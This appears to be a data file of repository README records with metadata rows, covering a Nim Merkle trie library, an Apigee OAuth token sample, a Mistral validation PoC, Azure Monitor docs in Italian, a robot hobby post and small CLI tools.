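    else:                                  # otherwise prepend the "1000" nibble
        full = "1000" + "00" + format(mm, "02b") + padded
    return int(full, 2).to_bytes(len(full) // 8, "big")

# two bits "10": 00mm = 0010, yyyy = 0010  ->  0b00100010
assert encode_keypath("10") == b"\x22"
# five bits "10110": even-nibble form  ->  0b10000001_00010110
assert encode_keypath("10110") == b"\x81\x16"
```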
### The API
The primary API for Binary-trie is `set` and `get`.
* set(key, value) --- _store a value associated with a key_
* get(key): value --- _get a value using a key_
Both `key` and `value` are of `BytesRange` type, and they cannot have zero length.
You can also use the convenience API `get` and `set` which accepts
`Bytes` or `string` (a `string` is conceptually wrong in this context
and may be costlier than a `BytesRange`, but it is good for testing purposes).
Getting a non-existent key will return zero length BytesRange.
Binary-trie also provides a dictionary syntax API for `set` and `get`.
* trie[key] = value -- same as `set`
* value = trie[key] -- same as `get`
* contains(key) a.k.a. `in` operator
Additional APIs are:
* exists(key) -- returns `bool`, to check key-value existence -- same as contains
* delete(key) -- remove a key-value from the trie
* deleteSubtrie(key) -- remove a key-value from the trie plus all of its subtrie
that starts with the same key prefix
* rootNode() -- get root node
* rootNode(node) -- replace the root node
* getRootHash(): `KeccakHash` with `BytesRange` type
* getDB(): `DB` -- get flat-db pointer
Constructor API:
* initBinaryTrie(DB, rootHash[optional]) -- rootHash has `BytesRange` or KeccakHash type
* init(BinaryTrie, DB, rootHash[optional])
Normally you would not set the rootHash when constructing an empty Binary-trie.
Setting the rootHash occurs in a scenario where you have a populated DB
with an existing trie structure and you know the rootHash,
and you want to continue/resume the trie operations.
## Examples
```Nim
import
  eth_trie/[db, binary, utils]
var db = newMemoryDB()
var trie = initBinaryTrie(db)
trie.set("key1", "value1")
trie.set("key2", "value2")
assert trie.get("key1") == "value1".toRange
assert trie.get("key2") == "value2".toRange
# delete all subtries whose keys start with the prefix "key"
trie.deleteSubtrie("key")
assert trie.get("key1") == zeroBytesRange
assert trie.get("key2") == zeroBytesRange
trie["moon"] = "sun"
assert "moon" in trie
assert trie["moon"] == "sun".toRange
```
Remember, `set` and `get` are trie operations. A single `set` operation may invoke
more than one store/lookup operation on the underlying DB. The same happens with the `get` operation;
it may do more than one flat-db lookup before it returns the requested value.
## The truth behind a lie
What kind of lie? Actually, `delete` and `deleteSubtrie` don't remove the
'deleted' nodes from the underlying DB. They only make the nodes inaccessible
to the user of the trie. The same also happens if you update the value of a key:
the old value node is not removed from the underlying DB.
A more subtle lie also happens when you add new entries into the trie using the `set` operation.
The previous hash of an affected branch becomes obsolete and is replaced by a new hash,
and the old hash becomes inaccessible to the user.
You may think that is a waste of storage space.
Luckily, we also provide some utilities to deal with this situation: the branch utils.
## The branch utils
The branch utils consist of these APIs:
* checkIfBranchExist(DB; rootHash; keyPrefix): bool
* getBranch(DB; rootHash; key): branch
* isValidBranch(branch, rootHash, key, value): bool
* getWitness(DB; nodeHash; key): branch
* getTrieNodes(DB; nodeHash): branch
`keyPrefix`, `key`, and `value` are byte containers with length greater than zero.
They can be BytesRange, Bytes, or string (again, for convenience and testing purposes).
`rootHash` and `nodeHash` are also byte containers,
but they have a constraint: they must be 32 bytes in length, and they must be keccak_256 hash values.
`branch` is a list of nodes, or in this case a seq[BytesRange].
A list? Yes, the structure is stored along with the encoded nodes.
Therefore a list is enough to reconstruct the entire trie/branch.
```Nim
import
  eth_trie/[db, binary, utils]
var db = newMemoryDB()
var trie = initBinaryTrie(db)
trie.set("key1", "value1")
trie.set("key2", "value2")
assert checkIfBranchExist(db, trie.getRootHash(), "key") == true
assert checkIfBranchExist(db, trie.getRootHash(), "key1") == true
assert checkIfBranchExist(db, trie.getRootHash(), "ken") == false
assert checkIfBranchExist(db, trie.getRootHash(), "key123") == false
```
The tree will look like:
```text
root ---> A(kvnode, *common key prefix*)
                      |
                      |
                      |
                B(branchnode)
                     / \
                    /   \
                   /     \
C1(kvnode, *remaining keypath*)    C2(kvnode, *remaining keypath*)
              |                                  |
              |                                  |
              |                                  |
  D1(leafnode, b'value1')            D2(leafnode, b'value2')
```
```Nim
var branchA = getBranch(db, trie.getRootHash(), "key1")
# ==> [A, B, C1, D1]
var branchB = getBranch(db, trie.getRootHash(), "key2")
# ==> [A, B, C2, D2]
assert isValidBranch(branchA, trie.getRootHash(), "key1", "value1") == true
# wrong key, return zero bytes
assert isValidBranch(branchA, trie.getRootHash(), "key5", "") == true
assert isValidBranch(branchB, trie.getRootHash(), "key1", "value1") # InvalidNode
var x = getBranch(db, trie.getRootHash(), "key")
# ==> [A]
x = getBranch(db, trie.getRootHash(), "key123") # InvalidKeyError
x = getBranch(db, trie.getRootHash(), "key5") # there is still a branch for a non-existent key
# ==> [A]
var branch = getWitness(db, trie.getRootHash(), "key1")
# equivalent to `getBranch(db, trie.getRootHash(), "key1")`
# ==> [A, B, C1, D1]
branch = getWitness(db, trie.getRootHash(), "key")
# this will include additional nodes of "key2"
# ==> [A, B, C1, D1, C2, D2]
var wholeTrie = getWitness(db, trie.getRootHash(), "")
# this will return the whole trie
# ==> [A, B, C1, D1, C2, D2]
var node = branch[1] # B
let nodeHash = keccak256.digest(node.baseAddr, uint(node.len))
var nodes = getTrieNodes(db, nodeHash)
assert nodes.len == wholeTrie.len - 1
# ==> [B, C1, D1, C2, D2]
```
## Remember the lie?
Because the trie `delete`, `deleteSubtrie` and `set` operations create inaccessible nodes in the underlying DB,
we need to remove them if necessary. We have already seen that `wholeTrie = getWitness(db, trie.getRootHash(), "")`
will return the whole trie, a list of accessible nodes.
We can then write the clean trie into a new DB instance to replace the old one.
## Sparse Merkle Trie
Sparse Merkle Trie (SMT) is a variant of Binary Trie which uses binary encoding to
represent the path during trie traversal. While Binary Trie uses three types of nodes,
SMT uses only one type of node, without any additional special encoding to store its key-path.
Actually, it doesn't even store its key-path anywhere as Binary Trie does;
the key-path is stored implicitly in the trie structure during key-value insertion.
Because the key-path is not encoded in any special way, the bits can be extracted directly from
the key without any conversion.
However, the key is restricted to a fixed length because the algorithm demands a fixed-height trie
to work properly. In this case, the trie height is limited to 160 levels,
so the key is of fixed length 20 bytes (8 bits x 20 = 160).
To be able to use variable-length keys, the algorithm can be adapted slightly by hashing the key before
constructing the binary key-path. For example, if using keccak256 as the hashing function,
then the height of the tree will be 256, but the key itself can be any length.
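For illustration, the 160 path bits come straight from the key's bits (a Python sketch with a made-up key, not part of the library):

```python
# A made-up 20-byte key; in this SMT every key must be exactly 20 bytes
key = bytes.fromhex("00112233445566778899aabbccddeeff00112233")
assert len(key) == 20

# One trie level per bit, most significant bit first: 0 = left, 1 = right
path = [(byte >> (7 - i)) & 1 for byte in key for i in range(8)]
assert len(path) == 160                        # matches the fixed trie height
assert path[:8] == [0, 0, 0, 0, 0, 0, 0, 0]    # the first byte is 0x00
```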
### The API
The primary API for Sparse Merkle Trie is `set` and `get`.
* set(key, value, rootHash[optional]) --- _store a value associated with a key_
* get(key, rootHash[optional]): value --- _get a value using a key_
Both `key` and `value` are of `BytesRange` type, and they cannot have zero length.
You can also use the convenience API `get` and `set` which accepts
`Bytes` or `string` (a `string` is conceptually wrong in this context
and may be costlier than a `BytesRange`, but it is good for testing purposes).
rootHash is an optional parameter. When used, `get` will get a key from a specific root,
and `set` will set a key at a specific root.
Getting a non-existent key will return zero length BytesRange or a zeroBytesRange.
Sparse Merkle Trie also provides a dictionary syntax API for `set` and `get`.
* trie[key] = value -- same as `set`
* value = trie[key] -- same as `get`
* contains(key) a.k.a. `in` operator
Additional APIs are:
* exists(key) -- returns `bool`, to check key-value existence -- same as contains
* delete(key) -- remove a key-value from the trie
* getRootHash(): `KeccakHash` with `BytesRange` type
* getDB(): `DB` -- get flat-db pointer
* prove(key, rootHash[optional]): proof -- useful for merkling
Constructor API:
* initSparseBinaryTrie(DB, rootHash[optional])
* init(SparseBinaryTrie, DB, rootHash[optional])
Normally you would not set the rootHash when constructing an empty Sparse Merkle Trie.
Setting the rootHash occurs in a scenario where you have a populated DB
with an existing trie structure and you know the rootHash,
and you want to continue/resume the trie operations.
## Examples
```Nim
import
  eth_trie/[db, sparse_binary, utils]

var
  db = newMemoryDB()
  trie = initSparseBinaryTrie(db)

let
  key1 = "01234567890123456789"
  key2 = "abcdefghijklmnopqrst"
trie.set(key1, "value1")
trie.set(key2, "value2")
assert trie.get(key1) == "value1".toRange
assert trie.get(key2) == "value2".toRange
trie.delete(key1)
assert trie.get(key1) == zeroBytesRange
trie.delete(key2)
assert trie[key2] == zeroBytesRange
```
Remember, `set` and `get` are trie operations. A single `set` operation may invoke
more than one store/lookup operation on the underlying DB. The same happens with the `get` operation;
it may do more than one flat-db lookup before it returns the requested value.
While Binary Trie performs a variable number of lookup and store operations, Sparse Merkle Trie
does a constant number of lookup and store operations for each `get` and `set` operation.
## Merkle Proofing
Using the ``prove`` and ``verifyProof`` APIs, we can do some merkling with SMT.
```Nim
let
  value1 = "hello world"
  badValue = "bad value"
trie[key1] = value1
var proof = trie.prove(key1)
assert verifyProof(proof, trie.getRootHash(), key1, value1) == true
assert verifyProof(proof, trie.getRootHash(), key1, badValue) == false
assert verifyProof(proof, trie.getRootHash(), key2, value1) == false
```
## License
Licensed and distributed under either of
* MIT license: [LICENSE-MIT](LICENSE-MIT) or http://opensource.org/licenses/MIT
or
* Apache License, Version 2.0, ([LICENSE-APACHEv2](LICENSE-APACHEv2) or http://www.apache.org/licenses/LICENSE-2.0)
at your option. This file may not be copied, modified, or distributed except according to those terms.
# Advanced API Services Token Generation
This sample shows how to integrate Advanced API Services (formerly known as App Services)
security features into the Apigee gateway in order to provide a single unified authentication
and authorization mechanism for applications consuming a combination of back-end services and
data.
This sample exposes a single endpoint, "/v1/datastore/token", which is responsible for all
token-related services. The sample currently supports the following:
-- Access token generation using the OAuth resource owner password grant (grant_type=password)
-- Access token generation using the OAuth client credentials grant (grant_type=client_credentials)
-- Access token invalidation
In this proxy, any user credentials provided as part of a token generation request are validated
against the Advanced API Services "/users" collection. Users can be easily defined in this
collection using the Advanced API Services portal.
In general, when a token is generated, the following occurs:
1) The Authorization header is decoded, and the consumer key and secret are extracted. If no
Authorization header is found, or if the key and secret are not found, a 401 Unauthorized
error is returned.
2) Various information is extracted from the request and stored in Apigee flow variables. A
401 Unauthorized error is returned if the information provided is not consistent with the
request type (no user credentials for a password grant, for example).
3) The consumer key provided is validated, and the custom attributes are extracted from the
application definition. A 401 Unauthorized error is returned if the custom attributes
are not present.
4) An Advanced API Services token generation request is executed, which validates any user
credentials provided in the request and returns a new Advanced API Services access token.
A 401 Unauthorized error is returned if the request fails.
5) The Advanced API Services token is extracted, and a new Apigee Gateway token is generated.
The Advanced API Services token is stored as an attribute of the new Gateway token.
6) A final response is generated containing the new Gateway access token, the token time-to-live,
and the refresh token (if present).
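For illustration, the Authorization header that step 1 decodes is the standard HTTP Basic form of the consumer key and secret; a client could build it like this (the key and secret shown are placeholders):

```python
import base64

def basic_auth_header(consumer_key, consumer_secret):
    """Standard HTTP Basic credentials: 'Basic ' + base64('key:secret')."""
    creds = (consumer_key + ":" + consumer_secret).encode()
    return "Basic " + base64.b64encode(creds).decode()

header = basic_auth_header("myConsumerKey", "myConsumerSecret")  # placeholders
assert header.startswith("Basic ")
# The proxy decodes this back into the key and secret in step 1
assert base64.b64decode(header.split(" ", 1)[1]) == b"myConsumerKey:myConsumerSecret"
```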
# Set up
* Import the proxy bundle into your Apigee system using the supplied "deploy.sh"
script.
# Configure
1. Using the Apigee Enterprise UI, create a new API Product and configure it to allow access to
all resources in the imported bundle by using the "/" and "/**" resource paths and the name of
the imported bundle.
2. Using the Apigee Enterprise UI, create a new developer.
3. Using the Apigee Enterprise UI, create a new developer application and associate it with the
developer created in step 2. Configure the application to use the API Product you created in
step 1. Once this application is saved you can view the consumer key (client ID) and shared
secret that were generated for this application. IMPORTANT: This consumer key and secret is
what should be used when tokens are generated, not the Advanced API Services key and secret.
4. Configure the application you created in step 3 with the following custom attributes (NOTE:
the case of the attribute names is important):
| Attribute name                 | Meaning                                                                          |
|--------------------------------|----------------------------------------------------------------------------------|
| DATA_STORE_APP_CONSUMER_KEY    | The consumer key associated with the Advanced API Services app you want to use.  |
| DATA_STORE_APP_CONSUMER_SECRET | The shared secret associated with the Advanced API Services app you want to use. |
| DATA_STORE_APP_NAME            | The name of the Advanced API Services application you want to use.               |
| DATA_STORE_ORG_NAME            | The name of the Advanced API Services organization you want to use.              |
All of this information can be obtained by referring to the "Getting Started" tab for your
selected organization and application in the Advanced API Services portal.
# Using the sample
The "invoke.sh" script provided with this sample includes commands to generate both password grant
and client credentials grant tokens, and also commands to invalidate tokens.
For a sample of how to validate and use tokens generated using this proxy, see the "token-validate"
sample.
# Get help
For assistance, please use [Apigee Support](https://community.apigee.com/content/apigee-customer-support).
Copyright © 2014, 2015 Apigee Corporation
Licensed under the Apache License, Version 2.0 (the "License"); you may not use
this file except in compliance with the License. You may obtain a copy
of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Cache client
===
The cache client will be used to access cache containers like Memcached, Redis, Filesystem etc.. | 28.75 | 97 | 0.773913 | eng_Latn | 0.967054 |
610b8b46ebc22187df31258911d70fde8c9f6235 | 983 | md | Markdown | content/project/agent-bingo-robot/index.md | glennji/glennjicom-academic | ad58b1333ae4cb2febf0104c18e3fb4e6997bedf | [
"MIT"
] | null | null | null | content/project/agent-bingo-robot/index.md | glennji/glennjicom-academic | ad58b1333ae4cb2febf0104c18e3fb4e6997bedf | [
"MIT"
] | null | null | null | content/project/agent-bingo-robot/index.md | glennji/glennjicom-academic | ad58b1333ae4cb2febf0104c18e3fb4e6997bedf | [
"MIT"
] | null | null | null | ---
title: "Agent Bingo Robot"
subtitle: "Cheap robot goes boom"
summary: ""
authors: [glennji]
crosslink: "true"
tags: ["inprogress", "hobby", "hardware"]
categories: [Robotics]
date: 2019-11-14T00:38:45+11:00
lastmod: 2019-11-14T00:38:45+11:00
featured: false
draft: false
---
A couple of years ago, Jules got given a cheap toy robot, and it wasn't long before it broke. He wasn't too fussed[^1] and eventually let me tear it to pieces. My big plan was to use the bot as a platform for experimentation, but of course you can see from the dates on the 'blog entries that it just didn't happen.
[^1]: Well, I don't remember him being too fussed anyway. Which probably means his tears and grief at losing this _precious toy_ (that he never played with) were brief.
## Plans
* find all the pieces
* test the DC motor drivers and an Arduino brain to return Bingo to "feature parity"
* Add ultrasonic distance sensors
* Add an LED display to his face or body
* ...
* robot uprising
| 35.107143 | 315 | 0.738555 | eng_Latn | 0.997742 |
610cf5f0816b5fec07641d630742a7f3a3cb4893 | 489 | md | Markdown | cmd/docs/mailbox_campaign_hash.md | lenatech/mailbox | 296601865f856d14baa5dd95a006d40841e09ac2 | [
"MIT"
] | 26 | 2017-06-29T13:22:52.000Z | 2022-01-22T15:36:05.000Z | cmd/docs/mailbox_campaign_hash.md | lenatech/mailbox | 296601865f856d14baa5dd95a006d40841e09ac2 | [
"MIT"
] | 7 | 2017-07-26T13:48:48.000Z | 2019-04-10T06:55:09.000Z | cmd/docs/mailbox_campaign_hash.md | toomore/mailbox | fee733cb16be21bae446b3b23f30068b76b33511 | [
"MIT"
] | 6 | 2017-07-08T05:53:19.000Z | 2020-10-15T09:56:58.000Z | ## mailbox campaign hash
Hash cid, uid
### Synopsis
產生一組開信追蹤連結,需要 cid, uid
```
mailbox campaign hash [flags]
```
### Options
```
--cid string campaign ID
-h, --help help for hash
--uid string user ID
```
### Options inherited from parent commands
```
--config string config file (default is $HOME/.mailbox.yaml)
```
### SEE ALSO
* [mailbox campaign](mailbox_campaign.md) - Campaign operator
###### Auto generated by spf13/cobra on 29-Jun-2017
| 15.28125 | 68 | 0.629857 | eng_Latn | 0.744312 |
610e6f6fce839edc60f6287b0e3c9be2b1326b27 | 2,191 | md | Markdown | ansible-tests/mistral/README.md | rthallisey/clapper | 7f6aeae9320c2c8b46c8f56d2a6191ecc6991e5b | [
"Apache-2.0"
] | 13 | 2015-10-19T02:02:23.000Z | 2019-01-03T09:07:08.000Z | ansible-tests/mistral/README.md | rthallisey/clapper | 7f6aeae9320c2c8b46c8f56d2a6191ecc6991e5b | [
"Apache-2.0"
] | 42 | 2015-09-04T18:02:17.000Z | 2016-12-20T14:47:09.000Z | ansible-tests/mistral/README.md | rthallisey/clapper | 7f6aeae9320c2c8b46c8f56d2a6191ecc6991e5b | [
"Apache-2.0"
] | 22 | 2015-07-27T16:37:59.000Z | 2019-04-09T02:04:10.000Z | # Mistral PoC
This is really rough. Basically, we add a Mistral action that runs a
shell script which runs ansible with a single validation.
## Prerequisites
You will need an undercloud with the mistral services running.
Assuming you have a recent enough instack-undercloud (Mitaka), the easiest is
to set `enable_mistral=true` in your 'undercloud.conf' file prior to running
`openstack undercloud install`. That's it.
On the undercloud, verify you have mistral_engine, mistral_api and
mistral_executor running with:
$ pgrep -a mistral
You also need to have ansible installed on the undercloud:
$ sudo pip install 'ansible>=2'
Finally, make sure `sudo` can run without the need for a tty. In `/etc/sudoers`
comment out the line "Defaults requiretty" if it's set.
## Mistral validation setup:
Install the `tripleo-validations` python module using the deploy.sh script:
$ cd clapper/ansible-tests/mistral
$ sudo ./deploy.sh
Load the `tripleo.validations` workbook:
$ mistral workbook-create validations_workbook.yaml
## Running mistral actions directly
Run the `tripleo.run_validation` or `tripleo.list_validations` actions with
mistral client:
mistral run-action -s tripleo.run_validation 512e
It will be run asynchronously and store the result in the mistral DB. Run
`mistral action-execution-list` to see the status of all Mistral runs and
`mistral action-execution-get-output <uuid>` to get a particular run's output.
The output is whatever dict we return from our Python code converted to json.
## Running validations using the mistral workflow
Create a context.json file containing the arguments passed to the workflow:
{
"validation_names": ["512e", "rabbitmq-limits"]
}
Run the `tripleo.validations.run` workflow with mistral client:
mistral execution-create tripleo.validations.run context.json
## Running groups of validations
Create a context.json file containing the arguments passed to the workflow:
{
"group_names": ["network", "post-deployment"]
}
Run the `tripleo.validations.run_group` workflow with mistral client:
mistral execution-create tripleo.validations.run_group context.json
| 28.454545 | 78 | 0.764035 | eng_Latn | 0.980617 |
610ed2008f2a6d087ebac97e1e1aa0d0d61686b5 | 183 | md | Markdown | README.md | amzoss/2021-08-24-suffolk-online | e273c13fea517a71823587113d4c0a4b75f422ce | [
"CC-BY-4.0"
] | null | null | null | README.md | amzoss/2021-08-24-suffolk-online | e273c13fea517a71823587113d4c0a4b75f422ce | [
"CC-BY-4.0"
] | null | null | null | README.md | amzoss/2021-08-24-suffolk-online | e273c13fea517a71823587113d4c0a4b75f422ce | [
"CC-BY-4.0"
] | null | null | null | # Library Carpentries workshop for Suffolk Cooperative Library System, Aug-Sep 2021
This code drives the [main workshop site](https://www.angelazoss.com/2021-08-24-suffolk-online/).
| 45.75 | 97 | 0.79235 | yue_Hant | 0.333207 |
610f3a847ee2c75eb30855dcd1c85d2077e02b86 | 136 | md | Markdown | buildSrc/Readme.md | Coronel-B/Mobius-Android | 5d696f0cb82d60da001f18dd61491cc50001de96 | [
"Apache-2.0"
] | 2 | 2021-03-21T04:50:09.000Z | 2021-03-23T23:21:44.000Z | buildSrc/Readme.md | Coronel-B/Mobius-KMM | 5d696f0cb82d60da001f18dd61491cc50001de96 | [
"Apache-2.0"
] | null | null | null | buildSrc/Readme.md | Coronel-B/Mobius-KMM | 5d696f0cb82d60da001f18dd61491cc50001de96 | [
"Apache-2.0"
] | null | null | null | (Use buildSrc to abstract imperative logic)[https://docs.gradle.org/current/userguide/organizing_gradle_projects.html#sec:build_sources] | 136 | 136 | 0.852941 | kor_Hang | 0.281196 |
610f526a834d21793d54fef547a56d82f6dccbee | 11,814 | md | Markdown | WindowsServerDocs/manage/windows-admin-center/azure/azure-monitor.md | baleng/windowsserverdocs.it-it | 8896bd5cff0154bf6b57c7de33efd7e65710947a | [
"CC-BY-4.0",
"MIT"
] | null | null | null | WindowsServerDocs/manage/windows-admin-center/azure/azure-monitor.md | baleng/windowsserverdocs.it-it | 8896bd5cff0154bf6b57c7de33efd7e65710947a | [
"CC-BY-4.0",
"MIT"
] | null | null | null | WindowsServerDocs/manage/windows-admin-center/azure/azure-monitor.md | baleng/windowsserverdocs.it-it | 8896bd5cff0154bf6b57c7de33efd7e65710947a | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Monitorare i server e configurare gli avvisi con monitoraggio di Azure dall'interfaccia di amministrazione di Windows
description: L'interfaccia di amministrazione di Windows (Project Honolulu) si integra con monitoraggio di Azure
ms.technology: manage
ms.topic: article
author: haley-rowland
ms.author: harowl
ms.localizationpriority: medium
ms.prod: windows-server
ms.date: 03/24/2019
ms.openlocfilehash: 28108a79bbdc654f6437a698c158a3f74d4423ba
ms.sourcegitcommit: 6aff3d88ff22ea141a6ea6572a5ad8dd6321f199
ms.translationtype: MT
ms.contentlocale: it-IT
ms.lasthandoff: 09/27/2019
ms.locfileid: "71407014"
---
# <a name="monitor-servers-and-configure-alerts-with-azure-monitor-from-windows-admin-center"></a>Monitorare i server e configurare gli avvisi con monitoraggio di Azure dall'interfaccia di amministrazione di Windows
[Altre informazioni sull'integrazione di Azure con l'interfaccia di amministrazione di Windows.](../plan/azure-integration-options.md)
[Monitoraggio di Azure](https://docs.microsoft.com/azure/azure-monitor/overview) è una soluzione che raccoglie, analizza e agisce sui dati di telemetria da un'ampia gamma di risorse, tra cui server e macchine virtuali Windows, sia in locale che nel cloud. Anche se monitoraggio di Azure estrae i dati dalle macchine virtuali di Azure e da altre risorse di Azure, questo articolo è incentrato sul funzionamento di monitoraggio di Azure con server e macchine virtuali locali, in particolare con l'interfaccia di amministrazione di Windows. Per informazioni su come usare monitoraggio di Azure per ricevere avvisi di posta elettronica sul cluster iperconvergente, vedere l'articolo relativo [all'uso di monitoraggio di Azure per inviare messaggi di posta elettronica per gli errori di servizio integrità](https://docs.microsoft.com/windows-server/storage/storage-spaces/configure-azure-monitor).
## <a name="how-does-azure-monitor-work"></a>Funzionamento di monitoraggio di Azure
- Gestione aggiornamenti di Azure (nello strumento aggiornamenti)
- Monitoraggio di Azure per le macchine virtuali (in Impostazioni Server), nota anche come informazioni dettagliate sulle macchine virtuali
È possibile iniziare a usare monitoraggio di Azure da uno di questi strumenti. Se il monitoraggio di Azure non è mai stato usato in precedenza, WAC effettuerà automaticamente il provisioning di un'area di lavoro Log Analytics (e dell'account di automazione di Azure, se necessario) e installerà e configurerà il Microsoft Monitoring Agent (MMA) nel server di destinazione La soluzione corrispondente verrà quindi installata nell'area di lavoro.
Ad esempio, se si passa prima allo strumento aggiornamenti per configurare Azure Gestione aggiornamenti, WAC sarà:
1. Installare MMA nel computer
2. Creare l'area di lavoro Log Analytics e l'account di automazione di Azure (perché in questo caso è necessario un account di automazione di Azure)
3. Installare la soluzione Gestione aggiornamenti nell'area di lavoro appena creata.
Se si vuole aggiungere un'altra soluzione di monitoraggio da WAC nello stesso server, WAC installa semplicemente tale soluzione nell'area di lavoro esistente a cui è connesso il server. WAC installerà inoltre eventuali altri agenti necessari.
Se ci si connette a un server diverso, ma è già stata configurata un'area di lavoro Log Analytics (tramite WAC o manualmente nel portale di Azure), è anche possibile installare l'agente MMA nel server e connetterlo a un'area di lavoro esistente. Quando si connette un server in un'area di lavoro, viene automaticamente avviata la raccolta dei dati e la creazione di report per le soluzioni installate nell'area di lavoro.
## <a name="azure-monitor-for-virtual-machines-aka-virtual-machine-insights"></a>Monitoraggio di Azure per le macchine virtuali (noto anche come Informazioni dettagliate sulla macchina virtuale
>Si applica a: Anteprima di Windows Admin Center
Quando si configura Monitoraggio di Azure per le macchine virtuali in Impostazioni server, l'interfaccia di amministrazione di Windows Abilita la soluzione Monitoraggio di Azure per le macchine virtuali, nota anche come Virtual Machine Insights. Questa soluzione consente di monitorare l'integrità del server e gli eventi, creare avvisi di posta elettronica, ottenere una visualizzazione consolidata delle prestazioni del server nell'ambiente e visualizzare le app, i sistemi e i servizi connessi a un determinato server.
> [!NOTE]
> Nonostante il nome, VM Insights funziona anche per i server fisici e le macchine virtuali.
Con i 5 GB di dati/mese/indennità clienti di monitoraggio di Azure, è possibile provare facilmente a eseguire questa operazione per un server o due senza doversi preoccupare di ricevere addebiti. Continua a leggere per visualizzare i vantaggi aggiuntivi dei server di onboarding in monitoraggio di Azure, ad esempio ottenere una visualizzazione consolidata delle prestazioni dei sistemi tra i server nell'ambiente.
### <a name="set-up-your-server-for-use-with-azure-monitor"></a>**Configurare il server per l'uso con monitoraggio di Azure**
Dalla pagina Panoramica di una connessione al server, fare clic sul pulsante nuovo "Gestisci avvisi" oppure passare a impostazioni server > monitoraggio e avvisi. In questa pagina, caricare il server in monitoraggio di Azure facendo clic su "Configura" e completando il riquadro di installazione. L'interfaccia di amministrazione esegue il provisioning dell'area di lavoro di Azure Log Analytics, installando l'agente necessario e verificando che la soluzione VM Insights sia configurata. Al termine, il server invierà i dati dei contatori delle prestazioni a monitoraggio di Azure, consentendo di visualizzare e creare avvisi di posta elettronica basati su questo server, dal portale di Azure.
### <a name="create-email-alerts"></a>**Creare avvisi di posta elettronica**
Dopo aver collegato il server a monitoraggio di Azure, è possibile usare i collegamenti ipertestuali intelligenti all'interno della pagina Impostazioni > monitoraggio e avvisi per passare al portale di Azure. L'interfaccia di amministrazione consente di raccogliere automaticamente i contatori delle prestazioni, in modo da poter [creare facilmente un nuovo avviso](https://docs.microsoft.com/azure/azure-monitor/platform/alerts-log) personalizzando una delle numerose query predefinite o scrivendone di personalizzate.
### <a name="get-a-consolidated-view-across-multiple-servers-"></a>\* * Ottenere una visualizzazione consolidata tra più server * *
Se si caricano più server in una singola area di lavoro Log Analytics all'interno di monitoraggio di Azure, è possibile ottenere una visualizzazione consolidata di tutti questi server dalla [soluzione macchine virtuali Insights](https://docs.microsoft.com/azure/azure-monitor/insights/vminsights-overview) in monitoraggio di Azure. Si noti che solo le schede prestazioni e mappe di macchine virtuali informazioni dettagliate per monitoraggio di Azure funzioneranno con i server locali: la scheda integrità funziona solo con le macchine virtuali di Azure. Per visualizzarlo nella portale di Azure, passare a monitoraggio di Azure > macchine virtuali (in Insights) e passare alle schede "prestazioni" o "mappe".
### <a name="visualize-apps-systems-and-services-connected-to-a-given-server"></a>**Visualizza le app, i sistemi e i servizi connessi a un determinato server**
Quando l'interfaccia di amministrazione carica un server nella soluzione VM Insights all'interno di monitoraggio di Azure, viene anche accesa una funzionalità denominata [mapping dei servizi](https://docs.microsoft.com/azure/azure-monitor/insights/service-map). Questa funzionalità consente di individuare automaticamente i componenti dell'applicazione e di mappare le comunicazioni tra i servizi in modo che sia possibile visualizzare facilmente le connessioni tra i server con informazioni dettagliate dal portale di Azure. Per trovarlo, passare alla portale di Azure > monitoraggio di Azure > macchine virtuali (in Insights) e passare alla scheda "Maps".
> [!NOTE]
> Le visualizzazioni per le informazioni dettagliate sulle macchine virtuali per monitoraggio di Azure sono attualmente disponibili in 6 aree pubbliche. Per informazioni aggiornate, vedere la [documentazione monitoraggio di Azure per le macchine virtuali](https://docs.microsoft.com/azure/azure-monitor/insights/vminsights-onboard#log-analytics). Per ottenere i vantaggi aggiuntivi offerti dalla soluzione Virtual Machine Insights descritta in precedenza, è necessario distribuire l'area di lavoro Log Analytics in una delle aree supportate.
## <a name="disabling-monitoring"></a>Disabilitazione del monitoraggio
Per disconnettere completamente il server dall'area di lavoro Log Analytics, disinstallare l'agente MMA. Questo significa che il server non invierà più dati all'area di lavoro e tutte le soluzioni installate in tale area di lavoro non raccoglieranno ed elaborano i dati da tale server. Tuttavia, ciò non influisce sull'area di lavoro stessa. tutte le risorse che inviano report all'area di lavoro continueranno a farlo. Per disinstallare l'agente MMA in WAC, passare a app & funzionalità, trovare il Microsoft Monitoring Agent e fare clic su Disinstalla.
Se si desidera disattivare una soluzione specifica in un'area di lavoro, sarà necessario [rimuovere la soluzione di monitoraggio dalla portale di Azure](https://docs.microsoft.com/azure/azure-monitor/insights/solutions#remove-a-management-solution). La rimozione di una soluzione di monitoraggio indica che le informazioni create da tale soluzione non verranno più generate _per i_ server che inviano report all'area di lavoro. Se, ad esempio, si disinstalla la soluzione Monitoraggio di Azure per le macchine virtuali, non vengono più visualizzate informazioni dettagliate sulle prestazioni delle macchine virtuali o dei server da qualsiasi computer connesso all'area di lavoro. | 137.372093 | 892 | 0.819621 | ita_Latn | 0.999616 |
61105d2f18bffc7f40cbf40fdeb759dccb5d2a83 | 278 | md | Markdown | README.md | aaxxios/utilities | d7ee24c68b51960c7104f5cad08f2c2bc7e756b8 | [
"MIT"
] | null | null | null | README.md | aaxxios/utilities | d7ee24c68b51960c7104f5cad08f2c2bc7e756b8 | [
"MIT"
] | null | null | null | README.md | aaxxios/utilities | d7ee24c68b51960c7104f5cad08f2c2bc7e756b8 | [
"MIT"
] | null | null | null | # utilities
===========
Compute the hash of any file.
Supported algorithms vary depending on your machine
#Usage
git clone https://github.com/aaxxios/utilities.git
cd utilities/routines
python setup.py build && python setup.py install
===Hashing with md5===
hasher md5 <file>
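For illustration, the core of such a tool can be written with Python's standard `hashlib`. This is a sketch of the idea, not necessarily this project's actual implementation:

```python
import hashlib

def file_hash(path, algorithm="md5", chunk_size=8192):
    """Stream the file in chunks so large files need not fit in memory."""
    h = hashlib.new(algorithm)  # raises ValueError if the algorithm is unsupported
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()
```

The set of names accepted by `hashlib.new` varies by machine, which matches the note above about supported algorithms.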
| 21.384615 | 51 | 0.744604 | eng_Latn | 0.832506 |
